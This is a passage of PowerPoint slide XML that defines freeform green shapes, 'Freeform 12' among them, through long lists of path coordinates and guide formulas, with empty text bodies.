                      <a:pt x="135" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="54"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="89" y="192"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="89" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="192"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00CC00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36280" name="Freeform 12"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5478" y="3527"/>
                <a:ext cx="95" cy="143"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 48 w 95"/>
                  <a:gd name="T1" fmla="*/ 54 h 143"/>
                  <a:gd name="T2" fmla="*/ 48 w 95"/>
                  <a:gd name="T3" fmla="*/ 47 h 143"/>
                  <a:gd name="T4" fmla="*/ 56 w 95"/>
                  <a:gd name="T5" fmla="*/ 64 h 143"/>
                  <a:gd name="T6" fmla="*/ 75 w 95"/>
                  <a:gd name="T7" fmla="*/ 73 h 143"/>
                  <a:gd name="T8" fmla="*/ 89 w 95"/>
                  <a:gd name="T9" fmla="*/ 65 h 143"/>
                  <a:gd name="T10" fmla="*/ 95 w 95"/>
                  <a:gd name="T11" fmla="*/ 70 h 143"/>
                  <a:gd name="T12" fmla="*/ 90 w 95"/>
                  <a:gd name="T13" fmla="*/ 84 h 143"/>
                  <a:gd name="T14" fmla="*/ 83 w 95"/>
                  <a:gd name="T15" fmla="*/ 92 h 143"/>
                  <a:gd name="T16" fmla="*/ 72 w 95"/>
                  <a:gd name="T17" fmla="*/ 95 h 143"/>
                  <a:gd name="T18" fmla="*/ 72 w 95"/>
                  <a:gd name="T19" fmla="*/ 106 h 143"/>
                  <a:gd name="T20" fmla="*/ 66 w 95"/>
                  <a:gd name="T21" fmla="*/ 114 h 143"/>
                  <a:gd name="T22" fmla="*/ 48 w 95"/>
                  <a:gd name="T23" fmla="*/ 140 h 143"/>
                  <a:gd name="T24" fmla="*/ 38 w 95"/>
                  <a:gd name="T25" fmla="*/ 139 h 143"/>
                  <a:gd name="T26" fmla="*/ 39 w 95"/>
                  <a:gd name="T27" fmla="*/ 129 h 143"/>
                  <a:gd name="T28" fmla="*/ 43 w 95"/>
                  <a:gd name="T29" fmla="*/ 115 h 143"/>
                  <a:gd name="T30" fmla="*/ 33 w 95"/>
                  <a:gd name="T31" fmla="*/ 107 h 143"/>
                  <a:gd name="T32" fmla="*/ 20 w 95"/>
                  <a:gd name="T33" fmla="*/ 98 h 143"/>
                  <a:gd name="T34" fmla="*/ 22 w 95"/>
                  <a:gd name="T35" fmla="*/ 94 h 143"/>
                  <a:gd name="T36" fmla="*/ 33 w 95"/>
                  <a:gd name="T37" fmla="*/ 77 h 143"/>
                  <a:gd name="T38" fmla="*/ 37 w 95"/>
                  <a:gd name="T39" fmla="*/ 67 h 143"/>
                  <a:gd name="T40" fmla="*/ 33 w 95"/>
                  <a:gd name="T41" fmla="*/ 51 h 143"/>
                  <a:gd name="T42" fmla="*/ 26 w 95"/>
                  <a:gd name="T43" fmla="*/ 38 h 143"/>
                  <a:gd name="T44" fmla="*/ 21 w 95"/>
                  <a:gd name="T45" fmla="*/ 30 h 143"/>
                  <a:gd name="T46" fmla="*/ 23 w 95"/>
                  <a:gd name="T47" fmla="*/ 36 h 143"/>
                  <a:gd name="T48" fmla="*/ 21 w 95"/>
                  <a:gd name="T49" fmla="*/ 34 h 143"/>
                  <a:gd name="T50" fmla="*/ 9 w 95"/>
                  <a:gd name="T51" fmla="*/ 17 h 143"/>
                  <a:gd name="T52" fmla="*/ 7 w 95"/>
                  <a:gd name="T53" fmla="*/ 13 h 143"/>
                  <a:gd name="T54" fmla="*/ 5 w 95"/>
                  <a:gd name="T55" fmla="*/ 6 h 143"/>
                  <a:gd name="T56" fmla="*/ 1 w 95"/>
                  <a:gd name="T57" fmla="*/ 0 h 143"/>
                  <a:gd name="T58" fmla="*/ 6 w 95"/>
                  <a:gd name="T59" fmla="*/ 0 h 143"/>
                  <a:gd name="T60" fmla="*/ 7 w 95"/>
                  <a:gd name="T61" fmla="*/ 6 h 143"/>
                  <a:gd name="T62" fmla="*/ 11 w 95"/>
                  <a:gd name="T63" fmla="*/ 10 h 143"/>
                  <a:gd name="T64" fmla="*/ 17 w 95"/>
                  <a:gd name="T65" fmla="*/ 12 h 143"/>
                  <a:gd name="T66" fmla="*/ 23 w 95"/>
                  <a:gd name="T67" fmla="*/ 16 h 143"/>
                  <a:gd name="T68" fmla="*/ 25 w 95"/>
                  <a:gd name="T69" fmla="*/ 15 h 143"/>
                  <a:gd name="T70" fmla="*/ 28 w 95"/>
                  <a:gd name="T71" fmla="*/ 20 h 143"/>
                  <a:gd name="T72" fmla="*/ 30 w 95"/>
                  <a:gd name="T73" fmla="*/ 24 h 143"/>
                  <a:gd name="T74" fmla="*/ 29 w 95"/>
                  <a:gd name="T75" fmla="*/ 27 h 143"/>
                  <a:gd name="T76" fmla="*/ 30 w 95"/>
                  <a:gd name="T77" fmla="*/ 29 h 143"/>
                  <a:gd name="T78" fmla="*/ 35 w 95"/>
                  <a:gd name="T79" fmla="*/ 36 h 143"/>
                  <a:gd name="T80" fmla="*/ 34 w 95"/>
                  <a:gd name="T81" fmla="*/ 39 h 143"/>
                  <a:gd name="T82" fmla="*/ 35 w 95"/>
                  <a:gd name="T83" fmla="*/ 44 h 143"/>
                  <a:gd name="T84" fmla="*/ 32 w 95"/>
                  <a:gd name="T85" fmla="*/ 45 h 143"/>
                  <a:gd name="T86" fmla="*/ 36 w 95"/>
                  <a:gd name="T87" fmla="*/ 49 h 143"/>
                  <a:gd name="T88" fmla="*/ 41 w 95"/>
                  <a:gd name="T89" fmla="*/ 49 h 143"/>
                  <a:gd name="T90" fmla="*/ 42 w 95"/>
                  <a:gd name="T91" fmla="*/ 53 h 143"/>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95"/>
                  <a:gd name="T139" fmla="*/ 0 h 143"/>
                  <a:gd name="T140" fmla="*/ 95 w 95"/>
                  <a:gd name="T141" fmla="*/ 143 h 143"/>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95" h="143">
                    <a:moveTo>
                      <a:pt x="43" y="54"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="48" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="12"/>
